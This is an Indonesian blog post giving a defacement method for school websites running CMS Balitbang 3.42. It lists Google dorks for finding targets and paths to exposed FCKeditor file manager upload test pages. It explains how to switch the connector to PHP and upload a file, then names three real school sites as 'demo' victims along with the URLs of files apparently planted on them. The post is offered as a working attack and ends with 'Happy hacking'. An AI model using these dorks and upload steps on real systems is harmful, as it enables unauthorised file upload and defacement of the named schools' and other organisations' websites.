Rabu, 17 April 2013

CMS Balitbang 3.42 [ DEFACE WEB BERDOMAIN SHC.ID ]


Dork :

inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Exploit : 
http://public_html/dir/editor/filemanager/connectors/uploadtest.html http://public_html/dir/editor/filemanager/connectors/test.html http://public_html/dir/editor/filemanager/browser/default/browser.html 

pilih salah satu, kalau sudah langsung masuk in exploitnya lalu pilih connector nya dari ASP --> PHP tinggal masukin filenya tapi berbentuk .TXT  

Demo:
http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.smppd1bpp.com/editor/filemanager/connectors/uploadtest.html
http://smp1kudus.sch.id/editor/filemanager/connectors/uploadtest.html

Hasil: 
http://www.sman1kotabaru.sch.id/userfiles/RSsite.txt
http://www.smppd1bpp.com/userfiles/RSsite.txt
http://smp1kudus.sch.id/userfiles/RSsite.txt 

Happy hacking :D
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)